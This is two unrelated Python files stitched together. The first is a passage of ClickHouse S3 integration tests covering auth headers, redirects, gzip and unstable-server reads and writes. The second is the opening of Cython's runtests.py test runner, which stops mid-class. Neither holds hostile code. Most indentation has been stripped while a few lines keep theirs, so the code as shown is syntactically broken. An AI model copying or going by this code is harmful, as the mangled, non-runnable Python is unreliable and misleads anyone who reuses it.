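# background and wait until each of them answers "OK" on its port.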
def run_s3_mocks(started_cluster):
logging.info("Starting s3 mocks")
mocks = (
("mock_s3.py", "resolver", "8080"),
("unstable_server.py", "resolver", "8081"),
("echo.py", "resolver", "8082"),
)
for mock_filename, container, port in mocks:
container_id = started_cluster.get_container_id(container)
current_dir = os.path.dirname(__file__)
started_cluster.copy_file_to_container(container_id, os.path.join(current_dir, "s3_mocks", mock_filename), mock_filename)
started_cluster.exec_in_container(container_id, ["python", mock_filename, port], detach=True)
# Wait for S3 mocks to start
for mock_filename, container, port in mocks:
num_attempts = 100
for attempt in range(num_attempts):
ping_response = started_cluster.exec_in_container(started_cluster.get_container_id(container),
["curl", "-s", f"http://localhost:{port}/"], nothrow=True)
if ping_response != 'OK':
if attempt == num_attempts - 1:
assert ping_response == 'OK', 'Expected "OK", but got "{}"'.format(ping_response)
else:
time.sleep(1)
else:
logging.debug(f"mock {mock_filename} ({port}) answered {ping_response} on attempt {attempt}")
break
logging.info("S3 mocks started")
def replace_config(old, new):
    with open(CONFIG_PATH, 'r') as config:
        config_lines = config.readlines()
    config_lines = [line.replace(old, new) for line in config_lines]
    with open(CONFIG_PATH, 'w') as config:
        config.writelines(config_lines)
def test_custom_auth_headers(started_cluster):
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = "select * from s3('http://resolver:8080/{bucket}/{file}', 'CSV', '{table_format}')".format(
bucket=started_cluster.minio_restricted_bucket,
file=filename,
table_format=table_format)
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
result = run_query(instance, get_query)
assert result == '1\t2\t3\n'
instance.query(
"CREATE TABLE test ({table_format}) ENGINE = S3('http://resolver:8080/{bucket}/{file}', 'CSV')".format(
bucket=started_cluster.minio_restricted_bucket,
file=filename,
table_format=table_format
))
assert run_query(instance, "SELECT * FROM test") == '1\t2\t3\n'
replace_config("<header>Authorization: Bearer TOKEN", "<header>Authorization: Bearer INVALID_TOKEN")
instance.query("SYSTEM RELOAD CONFIG")
ret, err = instance.query_and_get_answer_with_error("SELECT * FROM test")
assert ret == "" and err != ""
replace_config("<header>Authorization: Bearer INVALID_TOKEN", "<header>Authorization: Bearer TOKEN")
instance.query("SYSTEM RELOAD CONFIG")
assert run_query(instance, "SELECT * FROM test") == '1\t2\t3\n'
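# Test header exclusion: reading from the restricted directory is expected to fail
# with a Forbidden error (exit code 243).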
def test_custom_auth_headers_exclusion(started_cluster):
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = f"SELECT * FROM s3('http://resolver:8080/{started_cluster.minio_restricted_bucket}/restricteddirectory/{filename}', 'CSV', '{table_format}')"
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
with pytest.raises(helpers.client.QueryRuntimeException) as ei:
result = run_query(instance, get_query)
print(result)
assert ei.value.returncode == 243
assert 'Forbidden Error' in ei.value.stderr
def test_infinite_redirect(started_cluster):
bucket = "redirected"
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = f"select * from s3('http://resolver:{started_cluster.minio_redirect_port}/{bucket}/{filename}', 'CSV', '{table_format}')"
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
exception_raised = False
try:
run_query(instance, get_query)
except Exception as e:
assert str(e).find("Too many redirects while trying to access") != -1
exception_raised = True
finally:
assert exception_raised
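# Test reading gzip-compressed CSV from S3, with the compression either given
# explicitly ('gzip') or detected from the .gz extension ('auto').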
@pytest.mark.parametrize("extension,method", [
pytest.param("bin", "gzip", id="bin"),
pytest.param("gz", "auto", id="gz"),
])
def test_storage_s3_get_gzip(started_cluster, extension, method):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
filename = f"test_get_gzip.{extension}"
name = f"test_get_gzip_{extension}"
data = [
"Sophia Intrieri,55",
"Jack Taylor,71",
"Christopher Silva,66",
"Clifton Purser,35",
"Richard Aceuedo,43",
"Lisa Hensley,31",
"Alice Wehrley,1",
"Mary Farmer,47",
"Samara Ramirez,19",
"Shirley Lloyd,51",
"Santos Cowger,0",
"Richard Mundt,88",
"Jerry Gonzalez,15",
"Angela James,10",
"Norman Ortega,33",
""
]
buf = io.BytesIO()
compressed = gzip.GzipFile(fileobj=buf, mode="wb")
compressed.write(("\n".join(data)).encode())
compressed.close()
put_s3_file_content(started_cluster, bucket, filename, buf.getvalue())
run_query(instance, f"""CREATE TABLE {name} (name String, id UInt32) ENGINE = S3(
'http://{started_cluster.minio_ip}:{MINIO_INTERNAL_PORT}/{bucket}/{filename}',
'CSV',
'{method}')""")
run_query(instance, "SELECT sum(id) FROM {}".format(name)).splitlines() == ["565"]
def test_storage_s3_get_unstable(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
table_format = "column1 Int64, column2 Int64, column3 Int64, column4 Int64"
get_query = f"SELECT count(), sum(column3) FROM s3('http://resolver:8081/{started_cluster.minio_bucket}/test.csv', 'CSV', '{table_format}') FORMAT CSV"
result = run_query(instance, get_query)
assert result.splitlines() == ["500000,500000"]
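# Test writing uncompressed data through the S3 table engine and verify the stored
# object's content directly via the Minio client.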
def test_storage_s3_put_uncompressed(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
filename = "test_put_uncompressed.bin"
name = "test_put_uncompressed"
data = [
"'Gloria Thompson',99",
"'Matthew Tang',98",
"'Patsy Anderson',23",
"'Nancy Badillo',93",
"'Roy Hunt',5",
"'Adam Kirk',51",
"'Joshua Douds',28",
"'Jolene Ryan',0",
"'Roxanne Padilla',50",
"'Howard Roberts',41",
"'Ricardo Broughton',13",
"'Roland Speer',83",
"'Cathy Cohan',58",
"'Kathie Dawson',100",
"'Gregg Mcquistion',11",
]
run_query(instance, "CREATE TABLE {} (name String, id UInt32) ENGINE = S3('http://{}:{}/{}/{}', 'CSV')".format(
name, started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename))
run_query(instance, "INSERT INTO {} VALUES ({})".format(name, "),(".join(data)))
run_query(instance, "SELECT sum(id) FROM {}".format(name)).splitlines() == ["753"]
uncompressed_content = get_s3_file_content(started_cluster, bucket, filename)
assert sum([ int(i.split(',')[1]) for i in uncompressed_content.splitlines() ]) == 753
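# Test writing gzip-compressed data through the S3 table engine and verify it by
# decompressing the stored object.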
@pytest.mark.parametrize("extension,method", [
pytest.param("bin", "gzip", id="bin"),
pytest.param("gz", "auto", id="gz")
])
def test_storage_s3_put_gzip(started_cluster, extension, method):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
filename = f"test_put_gzip.{extension}"
name = f"test_put_gzip_{extension}"
data = [
"'Joseph Tomlinson',5",
"'Earnest Essary',44",
"'Matha Pannell',24",
"'Michael Shavers',46",
"'Elias Groce',38",
"'Pamela Bramlet',50",
"'Lewis Harrell',49",
"'Tamara Fyall',58",
"'George Dixon',38",
"'Alice Walls',49",
"'Paula Mais',24",
"'Myrtle Pelt',93",
"'Sylvia Naffziger',18",
"'Amanda Cave',83",
"'Yolanda Joseph',89"
]
run_query(instance, f"""CREATE TABLE {name} (name String, id UInt32) ENGINE = S3(
'http://{started_cluster.minio_ip}:{MINIO_INTERNAL_PORT}/{bucket}/{filename}',
'CSV',
'{method}')""")
run_query(instance, f"INSERT INTO {name} VALUES ({'),('.join(data)})")
run_query(instance, f"SELECT sum(id) FROM {name}").splitlines() == ["708"]
buf = io.BytesIO(get_s3_file_content(started_cluster, bucket, filename, decode=False))
f = gzip.GzipFile(fileobj=buf, mode="rb")
uncompressed_content = f.read().decode()
assert sum([ int(i.split(',')[1]) for i in uncompressed_content.splitlines() ]) == 708
runtests.py
#!/usr/bin/env python
from __future__ import print_function
import atexit
import base64
import os
import sys
import re
import gc
import heapq
import locale
import shutil
import time
import unittest
import doctest
import operator
import subprocess
import tempfile
import traceback
import warnings
import zlib
import glob
from contextlib import contextmanager
from collections import defaultdict
try:
import platform
IS_PYPY = platform.python_implementation() == 'PyPy'
IS_CPYTHON = platform.python_implementation() == 'CPython'
except (ImportError, AttributeError):
IS_CPYTHON = True
IS_PYPY = False
IS_PY2 = sys.version_info[0] < 3
CAN_SYMLINK = sys.platform != 'win32' and hasattr(os, 'symlink')
from io import open as io_open
try:
from StringIO import StringIO
except ImportError:
from io import StringIO # doesn't accept 'str' in Py2
try:
import cPickle as pickle
except ImportError:
import pickle
try:
import threading
except ImportError: # No threads, no problems
threading = None
try:
from unittest import SkipTest
except ImportError:
class SkipTest(Exception): # don't raise, only provided to allow except-ing it!
pass
def skip_test(reason):
sys.stderr.write("Skipping test: %s\n" % reason)
else:
def skip_test(reason):
raise SkipTest(reason)
try:
basestring
except NameError:
basestring = str
WITH_CYTHON = True
from distutils.command.build_ext import build_ext as _build_ext
from distutils import sysconfig
_to_clean = []
@atexit.register
def _cleanup_files():
"""
This is only used on Cygwin to clean up shared libraries that are unsafe
to delete while the test suite is running.
"""
for filename in _to_clean:
if os.path.isdir(filename):
shutil.rmtree(filename, ignore_errors=True)
else:
try:
os.remove(filename)
except OSError:
pass
def get_distutils_distro(_cache=[]):
if _cache:
return _cache[0]
    # late import to accommodate the setuptools override
from distutils.dist import Distribution
distutils_distro = Distribution()
if sys.platform == 'win32':
# TODO: Figure out why this hackery (see https://thread.gmane.org/gmane.comp.python.cython.devel/8280/).
config_files = distutils_distro.find_config_files()
try:
config_files.remove('setup.cfg')
except ValueError:
pass
distutils_distro.parse_config_files(config_files)
cfgfiles = distutils_distro.find_config_files()
try:
cfgfiles.remove('setup.cfg')
except ValueError:
pass
distutils_distro.parse_config_files(cfgfiles)
_cache.append(distutils_distro)
return distutils_distro
EXT_DEP_MODULES = {
'tag:numpy': 'numpy',
'tag:pythran': 'pythran',
'tag:setuptools': 'setuptools.sandbox',
'tag:asyncio': 'asyncio',
'tag:pstats': 'pstats',
'tag:posix': 'posix',
'tag:array': 'array',
'tag:coverage': 'Cython.Coverage',
'Coverage': 'Cython.Coverage',
'tag:ipython': 'IPython.testing.globalipapp',
'tag:jedi': 'jedi_BROKEN_AND_DISABLED',
'tag:test.support': 'test.support', # support module for CPython unit tests
}
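# Patch inspect.isfunction() so that Cython compiled functions
# ('cython_function_or_method') are also recognised as functions;
# unpatch_inspect_isfunction() restores the original behaviour.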
def patch_inspect_isfunction():
import inspect
orig_isfunction = inspect.isfunction
def isfunction(obj):
return orig_isfunction(obj) or type(obj).__name__ == 'cython_function_or_method'
isfunction._orig_isfunction = orig_isfunction
inspect.isfunction = isfunction
def unpatch_inspect_isfunction():
import inspect
try:
orig_isfunction = inspect.isfunction._orig_isfunction
except AttributeError:
pass
else:
inspect.isfunction = orig_isfunction
def def_to_cdef(source):
'''
Converts the module-level def methods into cdef methods, i.e.
@decorator
def foo([args]):
"""
[tests]
"""
[body]
becomes
def foo([args]):
"""
[tests]
"""
return foo_c([args])
cdef foo_c([args]):
[body]
'''
output = []
skip = False
def_node = re.compile(r'def (\w+)\(([^()*]*)\):').match
lines = iter(source.split('\n'))
for line in lines:
if not line.strip():
output.append(line)
continue
if skip:
if line[0] != ' ':
skip = False
else:
continue
if line[0] == '@':
skip = True
continue
m = def_node(line)
if m:
name = m.group(1)
args = m.group(2)
if args:
args_no_types = ", ".join(arg.split()[-1] for arg in args.split(','))
else:
args_no_types = ""
output.append("def %s(%s):" % (name, args_no_types))
line = next(lines)
if '"""' in line:
has_docstring = True
output.append(line)
for line in lines:
output.append(line)
if '"""' in line:
break
else:
has_docstring = False
output.append(" return %s_c(%s)" % (name, args_no_types))
output.append('')
output.append("cdef %s_c(%s):" % (name, args))
if not has_docstring:
output.append(line)
else:
output.append(line)
return '\n'.join(output)
def exclude_extension_in_pyver(*versions):
def check(ext):
return EXCLUDE_EXT if sys.version_info[:2] in versions else ext
return check
def exclude_extension_on_platform(*platforms):
def check(ext):
return EXCLUDE_EXT if sys.platform in platforms else ext
return check
def update_linetrace_extension(ext):
ext.define_macros.append(('CYTHON_TRACE', 1))
return ext
def update_numpy_extension(ext, set_api17_macro=True):
import numpy
from numpy.distutils.misc_util import get_info
ext.include_dirs.append(numpy.get_include())
if set_api17_macro and getattr(numpy, '__version__', '') not in ('1.19.0', '1.19.1'):
ext.define_macros.append(('NPY_NO_DEPRECATED_API', 'NPY_1_7_API_VERSION'))
# We need the npymath library for numpy.math.
# This is typically a static-only library.
for attr, value in get_info('npymath').items():
getattr(ext, attr).extend(value)
def update_gdb_extension(ext, _has_gdb=[None]):
# We should probably also check for Python support.
if not include_debugger:
_has_gdb[0] = False
if _has_gdb[0] is None:
try:
subprocess.check_call(["gdb", "--version"])
except (IOError, subprocess.CalledProcessError):
_has_gdb[0] = False
else:
_has_gdb[0] = True
if not _has_gdb[0]:
return EXCLUDE_EXT
return ext
def update_openmp_extension(ext):
ext.openmp = True
language = ext.language
if sys.platform == 'win32' and sys.version_info[:2] == (3,4):
# OpenMP tests fail in appveyor in Py3.4 -> just ignore them, EoL of Py3.4 is early 2019...
return EXCLUDE_EXT
if language == 'cpp':
flags = OPENMP_CPP_COMPILER_FLAGS
else:
flags = OPENMP_C_COMPILER_FLAGS
if flags:
compile_flags, link_flags = flags
ext.extra_compile_args.extend(compile_flags.split())
ext.extra_link_args.extend(link_flags.split())
return ext
elif sys.platform == 'win32':
return ext
return EXCLUDE_EXT
def update_cpp11_extension(ext):
"""
    Enable C++11 for extensions when the compiler supports it (gcc > 4.8, or clang).
"""
gcc_version = get_gcc_version(ext.language)
if gcc_version:
compiler_version = gcc_version.group(1)
if float(compiler_version) > 4.8:
ext.extra_compile_args.append("-std=c++11")
return ext
clang_version = get_clang_version(ext.language)
if clang_version:
ext.extra_compile_args.append("-std=c++11")
if sys.platform == "darwin":
ext.extra_compile_args.append("-stdlib=libc++")
ext.extra_compile_args.append("-mmacosx-version-min=10.7")
return ext
return EXCLUDE_EXT
def get_cc_version(language):
"""
    Return the version output of the configured C/C++ compiler (invoked with "-v").
"""
if language == 'cpp':
cc = sysconfig.get_config_var('CXX')
else:
cc = sysconfig.get_config_var('CC')
if not cc:
from distutils import ccompiler
cc = ccompiler.get_default_compiler()
if not cc:
return ''
# For some reason, cc can be e.g. 'gcc -pthread'
cc = cc.split()[0]
# Force english output
env = os.environ.copy()
env['LC_MESSAGES'] = 'C'
try:
p = subprocess.Popen([cc, "-v"], stderr=subprocess.PIPE, env=env)
except EnvironmentError:
# Be compatible with Python 3
warnings.warn("Unable to find the %s compiler: %s: %s" %
(language, os.strerror(sys.exc_info()[1].errno), cc))
return ''
_, output = p.communicate()
return output.decode(locale.getpreferredencoding() or 'ASCII', 'replace')
def get_gcc_version(language):
matcher = re.compile(r"gcc version (\d+\.\d+)").search
return matcher(get_cc_version(language))
def get_clang_version(language):
matcher = re.compile(r"clang(?:-|\s+version\s+)(\d+\.\d+)").search
return matcher(get_cc_version(language))
def get_openmp_compiler_flags(language):
"""
As of gcc 4.2, it supports OpenMP 2.5. Gcc 4.4 implements 3.0. We don't
(currently) check for other compilers.
returns a two-tuple of (CFLAGS, LDFLAGS) to build the OpenMP extension
"""
gcc_version = get_gcc_version(language)
if not gcc_version:
if sys.platform == 'win32':
return '/openmp', ''
else:
return None # not gcc - FIXME: do something about other compilers
# gcc defines "__int128_t", assume that at least all 64 bit architectures have it
global COMPILER_HAS_INT128
COMPILER_HAS_INT128 = getattr(sys, 'maxsize', getattr(sys, 'maxint', 0)) > 2**60
compiler_version = gcc_version.group(1)
    if compiler_version and [int(num) for num in compiler_version.split('.')] >= [4, 2]:
return '-fopenmp', '-fopenmp'
try:
locale.setlocale(locale.LC_ALL, '')
except locale.Error:
pass
COMPILER = None
COMPILER_HAS_INT128 = False
OPENMP_C_COMPILER_FLAGS = get_openmp_compiler_flags('c')
OPENMP_CPP_COMPILER_FLAGS = get_openmp_compiler_flags('cpp')
# Return this from the EXT_EXTRAS matcher callback to exclude the extension
EXCLUDE_EXT = object()
EXT_EXTRAS = {
'tag:numpy' : update_numpy_extension,
'tag:openmp': update_openmp_extension,
'tag:gdb': update_gdb_extension,
'tag:cpp11': update_cpp11_extension,
'tag:trace' : update_linetrace_extension,
'tag:bytesformat': exclude_extension_in_pyver((3, 3), (3, 4)), # no %-bytes formatting
'tag:no-macos': exclude_extension_on_platform('darwin'),
'tag:py3only': exclude_extension_in_pyver((2, 7)),
}
# TODO: use tags
VER_DEP_MODULES = {
# tests are excluded if 'CurrentPythonVersion OP VersionTuple', i.e.
# (2,4) : (operator.lt, ...) excludes ... when PyVer < 2.4.x
# The next line should start (3,); but this is a dictionary, so
# we can only have one (3,) key. Since 2.7 is supposed to be the
# last 2.x release, things would have to change drastically for this
# to be unsafe...
(2,999): (operator.lt, lambda x: x in ['run.special_methods_T561_py3',
'run.test_raisefrom',
'run.different_package_names',
'run.unicode_imports', # encoding problems on appveyor in Py2
'run.reimport_failure', # reimports don't do anything in Py2
]),
(3,): (operator.ge, lambda x: x in ['run.non_future_division',
'compile.extsetslice',
'compile.extdelslice',
'run.special_methods_T561_py2',
]),
(3,3) : (operator.lt, lambda x: x in ['build.package_compilation',
'build.cythonize_pep420_namespace',
'run.yield_from_py33',
'pyximport.pyximport_namespace',
'run.qualname',
]),
(3,4): (operator.lt, lambda x: x in ['run.py34_signature',
'run.test_unicode', # taken from Py3.7, difficult to backport
]),
(3,4,999): (operator.gt, lambda x: x in ['run.initial_file_path',
]),
(3,5): (operator.lt, lambda x: x in ['run.py35_pep492_interop',
'run.py35_asyncio_async_def',
'run.mod__spec__',
'run.pep526_variable_annotations', # typing module
'run.test_exceptions', # copied from Py3.7+
'run.time_pxd', # _PyTime_GetSystemClock doesn't exist in 3.4
]),
(3,7): (operator.lt, lambda x: x in ['run.pycontextvar',
'run.pep557_dataclasses', # dataclasses module
]),
}
INCLUDE_DIRS = [ d for d in os.getenv('INCLUDE', '').split(os.pathsep) if d ]
CFLAGS = os.getenv('CFLAGS', '').split()
CCACHE = os.getenv('CYTHON_RUNTESTS_CCACHE', '').split()
CDEFS = []
TEST_SUPPORT_DIR = 'testsupport'
BACKENDS = ['c', 'cpp']
UTF8_BOM_BYTES = r'\xef\xbb\xbf'.encode('ISO-8859-1').decode('unicode_escape')
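# Simple positional-argument memoisation, used for tag parsing and directory listings.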
def memoize(f):
uncomputed = object()
f._cache = {}
def func(*args):
res = f._cache.get(args, uncomputed)
if res is uncomputed:
res = f._cache[args] = f(*args)
return res
return func
@memoize
def parse_tags(filepath):
tags = defaultdict(list)
parse_tag = re.compile(r'#\s*(\w+)\s*:(.*)$').match
with io_open(filepath, encoding='ISO-8859-1', errors='ignore') as f:
for line in f:
# ignore BOM-like bytes and whitespace
line = line.lstrip(UTF8_BOM_BYTES).strip()
if not line:
if tags:
break # assume all tags are in one block
else:
continue
if line[0] != '#':
break
parsed = parse_tag(line)
if parsed:
tag, values = parsed.groups()
if tag in ('coding', 'encoding'):
continue
if tag == 'tags':
tag = 'tag'
print("WARNING: test tags use the 'tag' directive, not 'tags' (%s)" % filepath)
if tag not in ('mode', 'tag', 'ticket', 'cython', 'distutils', 'preparse'):
print("WARNING: unknown test directive '%s' found (%s)" % (tag, filepath))
values = values.split(',')
tags[tag].extend(filter(None, [value.strip() for value in values]))
elif tags:
break # assume all tags are in one block
return tags
list_unchanging_dir = memoize(lambda x: os.listdir(x)) # needs lambda to set function attribute
@memoize
def _list_pyregr_data_files(test_directory):
is_data_file = re.compile('(?:[.](txt|pem|db|html)|^bad.*[.]py)$').search
return ['__init__.py'] + [
filename for filename in list_unchanging_dir(test_directory)
if is_data_file(filename)]
def import_ext(module_name, file_path=None):
if file_path:
import imp
return imp.load_dynamic(module_name, file_path)
else:
try:
from importlib import invalidate_caches
except ImportError:
pass
else:
invalidate_caches()
return __import__(module_name, globals(), locals(), ['*'])
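# distutils build_ext subclass: drops -Wstrict-prototypes for C++ builds, prepends
# ccache when CYTHON_RUNTESTS_CCACHE is set, and adds /openmp for MSVC OpenMP builds.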
class build_ext(_build_ext):
def build_extension(self, ext):
try:
try: # Py2.7+ & Py3.2+
compiler_obj = self.compiler_obj
except AttributeError:
compiler_obj = self.compiler
if ext.language == 'c++':
compiler_obj.compiler_so.remove('-Wstrict-prototypes')
if CCACHE:
compiler_obj.compiler_so = CCACHE + compiler_obj.compiler_so
if getattr(ext, 'openmp', None) and compiler_obj.compiler_type == 'msvc':
ext.extra_compile_args.append('/openmp')
except Exception:
pass
_build_ext.build_extension(self, ext)
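# Collects Cython error/warning output written to a fake stderr and parses it into
# sorted "line:column: message" strings for comparison with the expected
# _ERRORS/_WARNINGS sections of a test file.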
class ErrorWriter(object):
match_error = re.compile(r'(warning:)?(?:.*:)?\s*([-0-9]+)\s*:\s*([-0-9]+)\s*:\s*(.*)').match
def __init__(self, encoding=None):
self.output = []
self.encoding = encoding
def write(self, value):
if self.encoding:
value = value.encode('ISO-8859-1').decode(self.encoding)
self.output.append(value)
def _collect(self):
s = ''.join(self.output)
results = {'errors': [], 'warnings': []}
for line in s.splitlines():
match = self.match_error(line)
if match:
is_warning, line, column, message = match.groups()
results['warnings' if is_warning else 'errors'].append((int(line), int(column), message.strip()))
return [["%d:%d: %s" % values for values in sorted(results[key])] for key in ('errors', 'warnings')]
def geterrors(self):
return self._collect()[0]
def getwarnings(self):
return self._collect()[1]
def getall(self):
return self._collect()
def close(self):
pass # ignore, only to match file-like interface
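# Aggregates per-metric timings and keeps a small heap of the slowest tests per
# metric for the summary printed at the end of the run.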
class Stats(object):
def __init__(self, top_n=8):
self.top_n = top_n
self.test_counts = defaultdict(int)
self.test_times = defaultdict(float)
self.top_tests = defaultdict(list)
def add_time(self, name, language, metric, t):
self.test_counts[metric] += 1
self.test_times[metric] += t
top = self.top_tests[metric]
push = heapq.heappushpop if len(top) >= self.top_n else heapq.heappush
# min-heap => pop smallest/shortest until longest times remain
push(top, (t, name, language))
@contextmanager
def time(self, name, language, metric):
t = time.time()
yield
t = time.time() - t
self.add_time(name, language, metric, t)
def update(self, stats):
# type: (Stats) -> None
for metric, t in stats.test_times.items():
self.test_times[metric] += t
self.test_counts[metric] += stats.test_counts[metric]
top = self.top_tests[metric]
for entry in stats.top_tests[metric]:
push = heapq.heappushpop if len(top) >= self.top_n else heapq.heappush
push(top, entry)
def print_stats(self, out=sys.stderr):
if not self.test_times:
return
lines = ['Times:\n']
for metric, t in sorted(self.test_times.items(), key=operator.itemgetter(1), reverse=True):
count = self.test_counts[metric]
top = self.top_tests[metric]
lines.append("%-12s: %8.2f sec (%4d, %6.3f / run) - slowest: %s\n" % (
metric, t, count, t / count,
', '.join("'{2}:{1}' ({0:.2f}s)".format(*item) for item in heapq.nlargest(self.top_n, top))))
out.write(''.join(lines))
class TestBuilder(object):
def __init__(self, rootdir, workdir, selectors, exclude_selectors, options,
with_pyregr, languages, test_bugs, language_level,
common_utility_dir, pythran_dir=None,
default_mode='run', stats=None,
add_embedded_test=False):
self.rootdir = rootdir
self.workdir = workdir
self.selectors = selectors
self.exclude_selectors = exclude_selectors
self.annotate = options.annotate_source
self.cleanup_workdir = options.cleanup_workdir
self.cleanup_sharedlibs = options.cleanup_sharedlibs
self.cleanup_failures = options.cleanup_failures
self.with_pyregr = with_pyregr
self.cython_only = options.cython_only
self.test_selector = re.compile(options.only_pattern).search if options.only_pattern else None
self.languages = languages
self.test_bugs = test_bugs
self.fork = options.fork
self.language_level = language_level
self.test_determinism = options.test_determinism
self.common_utility_dir = common_utility_dir
self.pythran_dir = pythran_dir
self.default_mode = default_mode
self.stats = stats
self.add_embedded_test = add_embedded_test
self.capture = options.capture
def build_suite(self):
suite = unittest.TestSuite()
filenames = os.listdir(self.rootdir)
filenames.sort()
# TODO: parallelise I/O with a thread pool for the different directories once we drop Py2 support
for filename in filenames:
path = os.path.join(self.rootdir, filename)
if os.path.isdir(path) and filename != TEST_SUPPORT_DIR:
if filename == 'pyregr' and not self.with_pyregr:
continue
if filename == 'broken' and not self.test_bugs:
continue
suite.addTest(
self.handle_directory(path, filename))
if (sys.platform not in ['win32'] and self.add_embedded_test
            # the embedding test is currently broken on macOS in Py3.8+
and (sys.version_info < (3, 8) or sys.platform != 'darwin')):
# Non-Windows makefile.
if [1 for selector in self.selectors if selector("embedded")] \
and not [1 for selector in self.exclude_selectors if selector("embedded")]:
suite.addTest(unittest.makeSuite(EmbedTest))
return suite
def handle_directory(self, path, context):
workdir = os.path.join(self.workdir, context)
if not os.path.exists(workdir):
os.makedirs(workdir)
suite = unittest.TestSuite()
filenames = list_unchanging_dir(path)
filenames.sort()
for filename in filenames:
filepath = os.path.join(path, filename)
module, ext = os.path.splitext(filename)
if ext not in ('.py', '.pyx', '.srctree'):
continue
if filename.startswith('.'):
continue # certain emacs backup files
if context == 'pyregr':
tags = defaultdict(list)
else:
tags = parse_tags(filepath)
fqmodule = "%s.%s" % (context, module)
if not [ 1 for match in self.selectors
if match(fqmodule, tags) ]:
continue
if self.exclude_selectors:
if [1 for match in self.exclude_selectors
if match(fqmodule, tags)]:
continue
mode = self.default_mode
if tags['mode']:
mode = tags['mode'][0]
elif context == 'pyregr':
mode = 'pyregr'
if ext == '.srctree':
if self.cython_only:
# EndToEnd tests always execute arbitrary build and test code
continue
if 'cpp' not in tags['tag'] or 'cpp' in self.languages:
suite.addTest(EndToEndTest(filepath, workdir,
self.cleanup_workdir, stats=self.stats,
capture=self.capture))
continue
# Choose the test suite.
if mode == 'pyregr':
if not filename.startswith('test_'):
continue
test_class = CythonPyregrTestCase
elif mode == 'run':
if module.startswith("test_"):
test_class = CythonUnitTestCase
else:
test_class = CythonRunTestCase
elif mode in ['compile', 'error']:
test_class = CythonCompileTestCase
else:
raise KeyError('Invalid test mode: ' + mode)
for test in self.build_tests(test_class, path, workdir,
module, mode == 'error', tags):
suite.addTest(test)
if mode == 'run' and ext == '.py' and not self.cython_only and not filename.startswith('test_'):
# additionally test file in real Python
min_py_ver = [
(int(pyver.group(1)), int(pyver.group(2)))
for pyver in map(re.compile(r'pure([0-9]+)[.]([0-9]+)').match, tags['tag'])
if pyver
]
if not min_py_ver or any(sys.version_info >= min_ver for min_ver in min_py_ver):
suite.addTest(PureDoctestTestCase(module, os.path.join(path, filename), tags, stats=self.stats))
return suite
def build_tests(self, test_class, path, workdir, module, expect_errors, tags):
warning_errors = 'werror' in tags['tag']
expect_warnings = 'warnings' in tags['tag']
if expect_errors:
if skip_c(tags) and 'cpp' in self.languages:
languages = ['cpp']
else:
languages = self.languages[:1]
else:
languages = self.languages
if 'c' in languages and skip_c(tags):
languages = list(languages)
languages.remove('c')
if 'cpp' in languages and 'no-cpp' in tags['tag']:
languages = list(languages)
languages.remove('cpp')
if not languages:
return []
language_levels = [2, 3] if 'all_language_levels' in tags['tag'] else [None]
pythran_dir = self.pythran_dir
if 'pythran' in tags['tag'] and not pythran_dir and 'cpp' in languages:
import pythran.config
try:
pythran_ext = pythran.config.make_extension(python=True)
except TypeError: # old pythran version syntax
pythran_ext = pythran.config.make_extension()
pythran_dir = pythran_ext['include_dirs'][0]
preparse_list = tags.get('preparse', ['id'])
tests = [ self.build_test(test_class, path, workdir, module, tags, language, language_level,
expect_errors, expect_warnings, warning_errors, preparse,
pythran_dir if language == "cpp" else None)
for language in languages
for preparse in preparse_list
for language_level in language_levels
]
return tests
def build_test(self, test_class, path, workdir, module, tags, language, language_level,
expect_errors, expect_warnings, warning_errors, preparse, pythran_dir):
language_workdir = os.path.join(workdir, language)
if not os.path.exists(language_workdir):
os.makedirs(language_workdir)
workdir = os.path.join(language_workdir, module)
if preparse != 'id':
workdir += '_%s' % (preparse,)
if language_level:
workdir += '_cy%d' % (language_level,)
return test_class(path, workdir, module, tags,
language=language,
preparse=preparse,
expect_errors=expect_errors,
expect_warnings=expect_warnings,
annotate=self.annotate,
cleanup_workdir=self.cleanup_workdir,
cleanup_sharedlibs=self.cleanup_sharedlibs,
cleanup_failures=self.cleanup_failures,
cython_only=self.cython_only,
test_selector=self.test_selector,
fork=self.fork,
language_level=language_level or self.language_level,
warning_errors=warning_errors,
test_determinism=self.test_determinism,
common_utility_dir=self.common_utility_dir,
pythran_dir=pythran_dir,
stats=self.stats)
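# Decide whether the plain C backend should be skipped for a test: either it is
# tagged 'cpp', or its distutils options set language=c++.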
def skip_c(tags):
if 'cpp' in tags['tag']:
return True
# We don't want to create a distutils key in the
# dictionary so we check before looping.
if 'distutils' in tags:
for option in tags['distutils']:
splitted = option.split('=')
if len(splitted) == 2:
argument, value = splitted
if argument.strip() == 'language' and value.strip() == 'c++':
return True
return False
def filter_stderr(stderr_bytes):
"""
Filter annoying warnings from output.
"""
if b"Command line warning D9025" in stderr_bytes:
        # MSVC: cl : Command line warning D9025 : overriding '/Ox' with '/Od'
stderr_bytes = b'\n'.join(
line for line in stderr_bytes.splitlines()
if b"Command line warning D9025" not in line)
return stderr_bytes
def filter_test_suite(test_suite, selector):
filtered_tests = []
for test in test_suite._tests:
if isinstance(test, unittest.TestSuite):
filter_test_suite(test, selector)
elif not selector(test.id()):
continue
filtered_tests.append(test)
test_suite._tests[:] = filtered_tests
class CythonCompileTestCase(unittest.TestCase):
def __init__(self, test_directory, workdir, module, tags, language='c', preparse='id',
expect_errors=False, expect_warnings=False, annotate=False, cleanup_workdir=True,
cleanup_sharedlibs=True, cleanup_failures=True, cython_only=False, test_selector=None,
fork=True, language_level=2, warning_errors=False,
test_determinism=False,
common_utility_dir=None, pythran_dir=None, stats=None):
self.test_directory = test_directory
self.tags = tags
self.workdir = workdir
self.module = module
self.language = language
self.preparse = preparse
self.name = module if self.preparse == "id" else "%s_%s" % (module, preparse)
self.expect_errors = expect_errors
self.expect_warnings = expect_warnings
self.annotate = annotate
self.cleanup_workdir = cleanup_workdir
self.cleanup_sharedlibs = cleanup_sharedlibs
self.cleanup_failures = cleanup_failures
